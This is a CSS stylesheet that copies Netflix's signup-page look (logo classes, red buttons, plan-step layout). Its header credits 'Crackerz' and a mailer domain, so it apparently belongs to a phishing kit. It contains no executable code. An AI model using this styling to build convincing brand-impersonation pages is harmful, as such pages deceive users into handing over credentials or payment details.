/* Programmer name :

		╔╗ ╦ ╦  ╔═╗╦═╗╔═╗╔═╗╦╔═╔═╗╦═╗╔═╗
		╠╩╗╚╦╝  ║  ╠╦╝╠═╣║  ╠╩╗║╣ ╠╦╝╔═╝
		╚═╝ ╩   ╚═╝╩╚═╩ ╩╚═╝╩ ╩╚═╝╩╚═╚═╝

 				#2018  Mailer-inbox-unlimited.gq  */

html,
body {
	height: 100%;
}

*,
*:before,
*:after {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

html,
body {
	font-size: 100%;
}

body {
	background: #fff;
	color: #222;
	padding: 0;
	margin: 0;
	font-family: "Helvetica Neue", "Helvetica", Helvetica, Arial, sans-serif;
	font-weight: normal;
	font-style: normal;
	line-height: 1;
	position: relative;
	cursor: default;
}

a:hover {
	cursor: pointer;
}

select {
	width: 100%;
}

button {
	border-style: solid;
	border-width: 0px;
	cursor: pointer;
	font-family: "Helvetica Neue", "Helvetica", Helvetica, Arial, sans-serif;
	font-weight: normal;
	line-height: normal;
	margin: 0 0 1.25rem;
	position: relative;
	text-decoration: none;
	text-align: center;
	-webkit-appearance: none;
	-webkit-border-radius: 0;
	display: inline-block;
	padding-top: 1rem;
	padding-right: 2rem;
	padding-bottom: 1.0625rem;
	padding-left: 2rem;
	font-size: 1rem;
	background-color: #008cba;
	border-color: #007095;
	color: #fff;
	transition: background-color 300ms ease-out;
}

button:hover,
button:focus {
	background-color: #007095;
}

button:hover,
button:focus {
	color: #fff;
}

button::-moz-focus-inner {
	border: 0;
	padding: 0;
}

@media only screen and (min-width: 40.063em) {
	button {
		display: inline-block;
	}
}

div,
ul,
li,
h1,
p {
	margin: 0;
	padding: 0;
}

a {
	color: #008cba;
	text-decoration: none;
	line-height: inherit;
}

a:hover,
a:focus {
	color: #0078a0;
}

p {
	font-family: inherit;
	font-weight: normal;
	font-size: 1rem;
	line-height: 1.6;
	margin-bottom: 1.25rem;
	text-rendering: optimizeLegibility;
}

h1 {
	font-family: "Helvetica Neue", "Helvetica", Helvetica, Arial, sans-serif;
	font-weight: normal;
	font-style: normal;
	color: #222;
	text-rendering: optimizeLegibility;
	margin-top: 0.2rem;
	margin-bottom: 0.5rem;
	line-height: 1.4;
}

h1 {
	font-size: 2.125rem;
}

ul {
	font-size: 1rem;
	line-height: 1.6;
	margin-bottom: 1.25rem;
	list-style-position: outside;
	font-family: inherit;
}

ul {
	margin-left: 1.1rem;
}

@media only screen and (min-width: 40.063em) {
	h1 {
		line-height: 1.4;
	}
	h1 {
		font-size: 2.75rem;
	}
}

@media print {
	* {
		background: transparent!important;
		color: #000!important;
		box-shadow: none!important;
		text-shadow: none!important;
	}
	a,
	a:visited {
		text-decoration: underline;
	}
	p {
		orphans: 3;
		widows: 3;
	}
}

label {
	font-size: 0.875rem;
	color: #4d4d4d;
	cursor: pointer;
	display: block;
	font-weight: normal;
	line-height: 1.5;
	margin-bottom: 0;
}

select::-ms-expand {
	display: none;
}

select {
	-webkit-appearance: none!important;
	-webkit-border-radius: 0px;
	background-color: #fafafa;
	background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZlcnNpb249IjEuMSIgeD0iMTJweCIgeT0iMHB4IiB3aWR0aD0iMjRweCIgaGVpZ2h0PSIzcHgiIHZpZXdCb3g9IjAgMCA2IDMiIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDYgMyIgeG1sOnNwYWNlPSJwcmVzZXJ2ZSI+PHBvbHlnb24gcG9pbnRzPSI1Ljk5MiwwIDIuOTkyLDMgLTAuMDA4LDAgIi8+PC9zdmc+);
	background-position: 100% center;
	background-repeat: no-repeat;
	border: 1px solid #ccc;
	padding: 0.5rem;
	font-size: 0.875rem;
	color: rgba(0, 0, 0, 0.75);
	line-height: normal;
	border-radius: 0;
	height: 2.3125rem;
}

select:hover {
	background-color: #f3f3f3;
	border-color: #999;
}

select {
	margin: 0 0 1rem 0;
}

body,
html {
	font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
	background-color: #f3f3f3;
	color: #333;
	font-size: 16px;
	direction: ltr;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

body {
	min-width: 320px;
	margin: 0;
}

h1 {
	font-size: 27px;
	margin: 0 0 .4em;
}

@media screen and (min-width:740px) {
	h1 {
		font-size: 38px;
	}
}

.centerContainer {
	margin: 0 auto 15px;
	padding: 20px 3% 60px;
	max-width: 978px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

a {
	text-decoration: none;
	color: #0071eb;
}

a:hover {
	text-decoration: underline;
}

ul {
	padding: 0;
}

ul>li {
	margin-left: 1.1em;
	margin-bottom: 5px;
	list-style-type: disc;
}

ul.structural {
	padding: 0;
	margin: 0;
}

ul.structural>li {
	list-style: none;
	margin-left: 0;
}

@media only screen and (max-width:600px) {
	h1 {
		font-size: 23px;
	}
}

@media (-webkit-min-device-pixel-ratio:2),
(-o-min-device-pixel-ratio:2/1),
div.basicLayout .nfHeader {
	border-bottom: 1px solid #e6e6e6;
}

div.basicLayout .centerContainer {
	padding: 20px 32px 0px;
}

div.basicLayout .slimWidth .nf-btn-primary {
	min-height: 48px;
	font-weight: 400;
	font-size: 17px;
}

div.basicLayout .nf-btn-primary {
	-webkit-border-radius: 2px;
	-moz-border-radius: 2px;
	border-radius: 2px;
}

.stepHeader {
	display: inline-block;
}

.stepTitle {
	display: inline-block;
	font-weight: 700;
	font-size: 23px;
}

.nfHeader {
	background-color: #f3f3f3;
	border-bottom: solid 1px #ccc;
	height: 90px;
}

.nfHeader.signupBasicHeader {
	height: 90px;
}

@media screen and (max-width:740px) {
	.nfHeader.signupBasicHeader {
		height: 75px;
	}
}

@media screen and (max-width:500px) {
	.nfHeader.signupBasicHeader {
		height: 45px;
	}
}

.noBorderHeader {
	background-color: transparent;
	border-bottom: 0;
	position: relative;
}

.site-footer-wrapper {
	min-width: 190px;
	width: 100%;
	margin-top: 80px;
	padding-bottom: 20px;
	font-size: 1em;
	color: #a6a6a6;
	position: relative;
}

.footer-divider {
	height: 0;
	width: 100%;
	border-top: 1px solid #e6e6e6;
}

.site-footer {
	margin: 0 auto;
	padding-top: 30px;
	width: 90%;
}

.footer-links {
	max-width: 1000px;
	font-size: 13px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

.footer-link-item {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	padding: 0;
	margin-bottom: 16px;
	display: inline-block;
	min-width: 100px;
	width: 25%;
	padding-right: 12px;
	vertical-align: top;
}

@media only screen and (max-width:740px) {
	.footer-link-item {
		width: 33%;
	}
}

@media only screen and (max-width:500px) {
	.footer-link-item {
		width: 50%;
	}
}

.footer-link {
	color: #a6a6a6;
}

::-moz-focus-inner {
	padding: 0;
	border: 0;
}

.nf-btn {
	display: inline-block;
	text-decoration: none;
	line-height: 1rem;
	vertical-align: middle;
	cursor: pointer;
	font-weight: 700;
	letter-spacing: .025rem;
	-webkit-border-radius: 2px;
	-moz-border-radius: 2px;
	border-radius: 2px;
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
	text-align: center;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	border: none;
	position: relative;
	min-height: 48px;
	-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .25);
	-moz-box-shadow: 0 1px 1px rgba(0, 0, 0, .25);
	box-shadow: 0 1px 1px rgba(0, 0, 0, .25);
	color: #000;
}

.nf-btn:disabled {
	cursor: default;
	opacity: .5;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}

.nf-btn:hover {
	text-decoration: none;
	background: #d9d9d9;
}

.nf-btn:active {
	background: #ccc;
}

.nf-btn-solid.nf-btn-primary {
	color: #fff;
	background-color: #e50914;
}

.nf-btn-solid.nf-btn-primary:hover {
	background-color: #f6121d;
}

.nf-btn-solid.nf-btn-primary:active {
	background-color: #e50914;
}

.nf-btn-solid.nf-btn-primary:disabled {
	opacity: .5;
}

.nf-btn {
	position: relative;
	font-size: 1rem;
	padding: .75rem 1.33333333rem;
	min-width: 74px;
	min-height: 48px;
	width: 100%;
}

@media only screen and (min-width:500px) {
	.nf-btn {
		width: auto;
	}
}

.nf-btn.nf-btn-oversize {
	font-size: 19px;
	padding: .75rem 25.33333333px;
	min-width: 110px;
	min-height: 60px;
	width: 100%;
	line-height: 19px;
}

body {
	background: #fff;
}

.simpleContainer {
	width: 100%;
	overflow: hidden;
	-webkit-tap-highlight-color: transparent;
}

.site-footer-wrapper {
	opacity: 1;
	margin-top: 0;
	background-color: #f3f3f3;
}

.centerContainer {
	overflow: hidden;
	display: none;
}

.centerContainer.firstLoad {
	display: block;
}

html,
body {
	height: 100%;
}

*,
*:before,
*:after {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

html,
body {
	font-size: 100%;
}

body {
	background: #fff;
	color: #222;
	padding: 0;
	margin: 0;
	font-family: "Helvetica Neue", "Helvetica", Helvetica, Arial, sans-serif;
	font-weight: normal;
	font-style: normal;
	line-height: 1;
	position: relative;
	cursor: default;
}

a:hover {
	cursor: pointer;
}

select {
	width: 100%;
}

button {
	border-style: solid;
	border-width: 0px;
	cursor: pointer;
	font-family: "Helvetica Neue", "Helvetica", Helvetica, Arial, sans-serif;
	font-weight: normal;
	line-height: normal;
	margin: 0 0 1.25rem;
	position: relative;
	text-decoration: none;
	text-align: center;
	-webkit-appearance: none;
	-webkit-border-radius: 0;
	display: inline-block;
	padding-top: 1rem;
	padding-right: 2rem;
	padding-bottom: 1.0625rem;
	padding-left: 2rem;
	font-size: 1rem;
	background-color: #008cba;
	border-color: #007095;
	color: #fff;
	transition: background-color 300ms ease-out;
}

button:hover,
button:focus {
	background-color: #007095;
}

button:hover,
button:focus {
	color: #fff;
}

button::-moz-focus-inner {
	border: 0;
	padding: 0;
}

@media only screen and (min-width: 40.063em) {
	button {
		display: inline-block;
	}
}

div,
ul,
li,
h1,
p {
	margin: 0;
	padding: 0;
}

a {
	color: #008cba;
	text-decoration: none;
	line-height: inherit;
}

a:hover,
a:focus {
	color: #0078a0;
}

p {
	font-family: inherit;
	font-weight: normal;
	font-size: 1rem;
	line-height: 1.6;
	margin-bottom: 1.25rem;
	text-rendering: optimizeLegibility;
}

h1 {
	font-family: "Helvetica Neue", "Helvetica", Helvetica, Arial, sans-serif;
	font-weight: normal;
	font-style: normal;
	color: #222;
	text-rendering: optimizeLegibility;
	margin-top: 0.2rem;
	margin-bottom: 0.5rem;
	line-height: 1.4;
}

h1 {
	font-size: 2.125rem;
}

ul {
	font-size: 1rem;
	line-height: 1.6;
	margin-bottom: 1.25rem;
	list-style-position: outside;
	font-family: inherit;
}

ul {
	margin-left: 1.1rem;
}

@media only screen and (min-width: 40.063em) {
	h1 {
		line-height: 1.4;
	}
	h1 {
		font-size: 2.75rem;
	}
}

@media print {
	* {
		background: transparent!important;
		color: #000!important;
		box-shadow: none!important;
		text-shadow: none!important;
	}
	a,
	a:visited {
		text-decoration: underline;
	}
	p {
		orphans: 3;
		widows: 3;
	}
}

label {
	font-size: 0.875rem;
	color: #4d4d4d;
	cursor: pointer;
	display: block;
	font-weight: normal;
	line-height: 1.5;
	margin-bottom: 0;
}

select::-ms-expand {
	display: none;
}

select {
	-webkit-appearance: none!important;
	-webkit-border-radius: 0px;
	background-color: #fafafa;
	background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZlcnNpb249IjEuMSIgeD0iMTJweCIgeT0iMHB4IiB3aWR0aD0iMjRweCIgaGVpZ2h0PSIzcHgiIHZpZXdCb3g9IjAgMCA2IDMiIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDYgMyIgeG1sOnNwYWNlPSJwcmVzZXJ2ZSI+PHBvbHlnb24gcG9pbnRzPSI1Ljk5MiwwIDIuOTkyLDMgLTAuMDA4LDAgIi8+PC9zdmc+);
	background-position: 100% center;
	background-repeat: no-repeat;
	border: 1px solid #ccc;
	padding: 0.5rem;
	font-size: 0.875rem;
	color: rgba(0, 0, 0, 0.75);
	line-height: normal;
	border-radius: 0;
	height: 2.3125rem;
}

select:hover {
	background-color: #f3f3f3;
	border-color: #999;
}

select {
	margin: 0 0 1rem 0;
}

::-moz-focus-inner {
	padding: 0;
	border: 0;
}

.screen-reader-text {
	position: absolute;
	top: -9999px;
	left: -9999px;
}

div.whiteDesign .nfHeader {
	border-bottom: 1px solid #e6e6e6;
}

@media screen and (max-width:500px),
screen and (orientation:landscape) and (max-width:740px) {
	div.whiteDesign .svg-icon-netflix-logo {
		padding-top: 0;
	}
}

.nfHeader {
	background-color: #f3f3f3;
	border-bottom: solid 1px #ccc;
	height: 90px;
}

.nfHeader.signupBasicHeader {
	height: 90px;
}

@media screen and (max-width:740px) {
	.nfHeader.signupBasicHeader {
		height: 75px;
	}
}

@media screen and (max-width:500px) {
	.nfHeader.signupBasicHeader {
		height: 45px;
	}
}

.noBorderHeader {
	background-color: transparent;
	border-bottom: 0;
	position: relative;
}

.svg-nfLogo {
	text-decoration: none;
	vertical-align: middle;
	fill: #e50914;
	display: inline-block;
	line-height: 90px;
}

.svg-nfLogo .svg-icon-netflix-logo {
	height: 45px;
	width: 167px;
	vertical-align: middle;
}

@media screen and (max-width:740px) {
	.svg-nfLogo {
		line-height: 75px;
	}
}

@media screen and (max-width:500px),
screen and (orientation:landscape) and (max-width:740px) {
	.svg-nfLogo {
		line-height: 45px;
	}
	.svg-nfLogo .svg-icon-netflix-logo {
		height: 20px;
		width: 75px;
		padding-top: 12px;
	}
}

.svg-nfLogo.signupBasicHeader {
	margin-left: 3%;
}

.authLinks {
	float: right;
	color: #333;
	font-weight: 700;
	font-size: 19px;
	line-height: 90px;
}

@media screen and (max-width:740px) {
	.authLinks {
		font-size: 16px;
		line-height: 75px;
	}
}

@media screen and (max-width:500px) {
	.authLinks {
		font-size: 14px;
		line-height: 45px;
	}
}

.authLinks.signupBasicHeader {
	margin: 0 3%;
}

@media screen and (max-width:500px) {
	.authLinks.signupBasicHeader {
		margin: 0 10px;
	}
}

::-moz-focus-inner {
	padding: 0;
	border: 0;
}

a {
	text-decoration: none;
	color: #0071eb;
}

a:hover {
	text-decoration: underline;
}

ul {
	padding: 0;
}

ul>li {
	margin-left: 1.1em;
	margin-bottom: 5px;
	list-style-type: disc;
}

ul.structural {
	padding: 0;
	margin: 0;
}

ul.structural>li {
	list-style: none;
	margin-left: 0;
}

.footer-top-a {
	color: #a6a6a6;
}

.site-footer {
	margin: 0 auto;
	padding-top: 30px;
	width: 90%;
}

.footer-top {
	padding: 0;
	margin: 0 0 20px;
}

.footer-links {
	max-width: 1000px;
	font-size: 13px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

.footer-link-item {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	padding: 0;
	margin-bottom: 16px;
	display: inline-block;
	min-width: 100px;
	width: 25%;
	padding-right: 12px;
	vertical-align: top;
}

@media only screen and (max-width:740px) {
	.footer-link-item {
		width: 33%;
	}
}

@media only screen and (max-width:500px) {
	.footer-link-item {
		width: 50%;
	}
}

.footer-link {
	color: #a6a6a6;
}

.lang-selection-container {
	display: inline-block;
}

.nfLabel {
	font-size: 16px;
	color: #333;
}

.nfSelectWrapper {
	display: inline-block;
	position: relative;
	max-width: 500px;
}

.nfSelectWrapper.selectArrow {
	display: inline-block;
	width: 100%;
}

.nfSelectWrapper.selectArrow .nfSelectPlacement {
	position: relative;
}

.nfSelectWrapper.selectArrow .nfSelectPlacement::after {
	background-color: #fff;
	content: '';
	position: absolute;
	pointer-events: none;
	border: 6px solid;
	border-color: #333 #fff #fff #fff;
	right: 10px;
	top: 40%;
}

.nfSelectWrapper.selectArrow.prefix .nfSelectPlacement.globe::before {
	content: '\e896';
}

.nfSelectWrapper.selectArrow.prefix .nfSelectPlacement::before {
	top: 40%;
	left: 15px;
	-webkit-transform: translateY(-50%);
	-moz-transform: translateY(-50%);
	-ms-transform: translateY(-50%);
	-o-transform: translateY(-50%);
	transform: translateY(-50%);
	font-family: nf-icon;
	color: #333;
	font-size: 16px;
	position: absolute;
	pointer-events: none;
}

.nfSelectWrapper.selectArrow.prefix .nfSelect {
	padding-left: 42px;
}

.nfSelectWrapper.selectArrow.inFooter .nfSelect {
	color: inherit;
}

.nfSelectWrapper .placeLabel {
	position: absolute;
	top: 50%;
	-webkit-transform: translateY(-50%);
	-moz-transform: translateY(-50%);
	-ms-transform: translateY(-50%);
	-o-transform: translateY(-50%);
	transform: translateY(-50%);
	left: 10px;
	color: #8c8c8c;
	font-size: 14px;
}

@media only screen and (min-width:740px) {
	.nfSelectWrapper .placeLabel {
		font-size: 16px;
	}
}

.nfSelect {
	background: #fff;
	font-size: 16px;
	height: 48px;
	border: 1px solid #a6a6a6;
	-webkit-appearance: none;
	-moz-appearance: none;
	appearance: none;
	-webkit-border-radius: 2px;
	-moz-border-radius: 2px;
	border-radius: 2px;
	width: 100%;
	padding: 10px 30px 12px 10px;
}

.nfSelect::-ms-expand {
	display: none;
}

.nfSelect:-moz-focusring {
	color: transparent;
	text-shadow: 0 0 0 #000;
}

.nfSelect option:disabled {
	color: #a6a6a6;
}

::-moz-focus-inner {
	padding: 0;
	border: 0;
}

h1 {
	font-size: 27px;
	margin: 0 0 .4em;
}

@media screen and (min-width:740px) {
	h1 {
		font-size: 38px;
	}
}

.centerContainer {
	margin: 0 auto 15px;
	padding: 20px 3% 60px;
	max-width: 978px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

a {
	text-decoration: none;
	color: #0071eb;
}

a:hover {
	text-decoration: underline;
}

.pointer {
	cursor: pointer;
}

@media only screen and (max-width:600px) {
	h1 {
		font-size: 23px;
	}
}

div.whiteDesign .centerContainer {
	padding: 20px 32px 60px;
}

div.whiteDesign .stepIndicator {
	text-align: inherit;
	font-size: 13px;
}

div.whiteDesign .slimWidth .planContainer {
	max-width: 340px;
}

div.whiteDesign .slimWidth .nf-btn-primary {
	min-height: 48px;
	font-weight: 400;
	font-size: 17px;
}

div.whiteDesign .slimWidth .contextStep .submitBtnContainer {
	max-width: 340px;
}

@media only screen and (max-width:600px) {
	div.whiteDesign .planContainer {
		text-align: left;
	}
}

div.whiteDesign .planContainer .contextBody {
	margin: 0;
	font-size: 17px;
}

div.whiteDesign .stepLogoContainer {
	display: inline-block;
}

div.whiteDesign .stepLogoContainer .stepLogo {
	margin: 100px 0 20px;
}

div.whiteDesign .planStepLogo {
	width: 50px;
	-moz-background-size: 50px;
	background-size: 50px;
	height: 50px;
}

div.whiteDesign .nf-btn-primary {
	-webkit-border-radius: 2px;
	-moz-border-radius: 2px;
	border-radius: 2px;
}

.stepHeader {
	display: inline-block;
}

.stepIndicator {
	text-align: left;
	display: block;
	font-size: 13px;
	line-height: 19px;
}

.stepTitle {
	display: inline-block;
	font-weight: 700;
	font-size: 23px;
}

::-moz-focus-inner {
	padding: 0;
	border: 0;
}

.nf-btn {
	display: inline-block;
	text-decoration: none;
	line-height: 1rem;
	vertical-align: middle;
	cursor: pointer;
	font-weight: 700;
	letter-spacing: .025rem;
	-webkit-border-radius: 2px;
	-moz-border-radius: 2px;
	border-radius: 2px;
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
	text-align: center;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	border: none;
	position: relative;
	min-height: 48px;
	-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .25);
	-moz-box-shadow: 0 1px 1px rgba(0, 0, 0, .25);
	box-shadow: 0 1px 1px rgba(0, 0, 0, .25);
	color: #000;
}

.nf-btn:disabled {
	cursor: default;
	opacity: .5;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}

.nf-btn:hover {
	text-decoration: none;
	background: #d9d9d9;
}

.nf-btn:active {
	background: #ccc;
}

.nf-btn-solid.nf-btn-primary {
	color: #fff;
	background-color: #e50914;
}

.nf-btn-solid.nf-btn-primary:hover {
	background-color: #f6121d;
}

.nf-btn-solid.nf-btn-primary:active {
	background-color: #e50914;
}

.nf-btn-solid.nf-btn-primary:disabled {
	opacity: .5;
}

.nf-btn {
	position: relative;
	font-size: 1rem;
	padding: .75rem 1.33333333rem;
	min-width: 74px;
	min-height: 48px;
	width: 100%;
}

@media only screen and (min-width:500px) {
	.nf-btn {
		width: auto;
	}
}

.nf-btn.nf-btn-oversize {
	font-size: 19px;
	padding: .75rem 25.33333333px;
	min-width: 110px;
	min-height: 60px;
	width: 100%;
	line-height: 19px;
}

#appMountPoint .double-sized-tap-target,
#appMountPoint .full-page-tap-target {
	outline: 0;
}

#appMountPoint .double-sized-tap-target {
	display: block;
	position: absolute;
	width: 200%;
	height: 200%;
	top: -50%;
	left: -50%;
}

#appMountPoint .submitBtnContainer:not(.fixedComp) {
	position: relative;
}

#appMountPoint .full-page-tap-target {
	display: block;
	position: absolute;
	top: 0;
	left: 0;
	bottom: -80px;
	right: 0;
}

#appMountPoint .simpleContainer {
	position: relative;
	overflow: visible;
	padding-bottom: 15px;
}

#appMountPoint .pointer {
	cursor: pointer;
}

.simpleContainer {
	width: 100%;
	overflow: hidden;
	-webkit-tap-highlight-color: transparent;
}

.centerContainer {
	overflow: hidden;
	display: none;
}

.centerContainer.firstLoad {
	display: block;
}

.planStepLogo {
	background: url(../img/check.png) no-repeat 50% 50%;
	-moz-background-size: 60px;
	background-size: 60px;
	height: 60px;
}

.planContainer {
	text-align: center;
	max-width: 440px;
	margin: 0 auto;
}

.planContainer .stepLogo {
	display: block;
	margin: 10% 0 10%;
}

.planContainer .contextRow {
	max-width: 300px;
	display: inline-block;
}

.planContainer .contextBody {
	margin: 30px 0;
	font-size: 19px;
}

.submitBtnContainer {
	text-align: center;
	max-width: 440px;
	margin: 0 auto;
}

.simpleContainer .submitBtnContainer {
	margin-top: 24px;
}

@font-face {
	font-family: nf-icon;
	src: url(../fonts/nf-icon-v1-93.eot);
	src: url(../fonts/nf-icon-v1-93.eot#iefix) format('embedded-opentype'), url(../fonts/nf-icon-v1-93.woff) format('woff'), url(../fonts/nf-icon-v1-93.ttf) format('truetype'), url(../fonts/nf-icon-v1-93.svg#nf-icon-v1-93) format('svg');
	font-weight: 400;
	font-style: normal;
}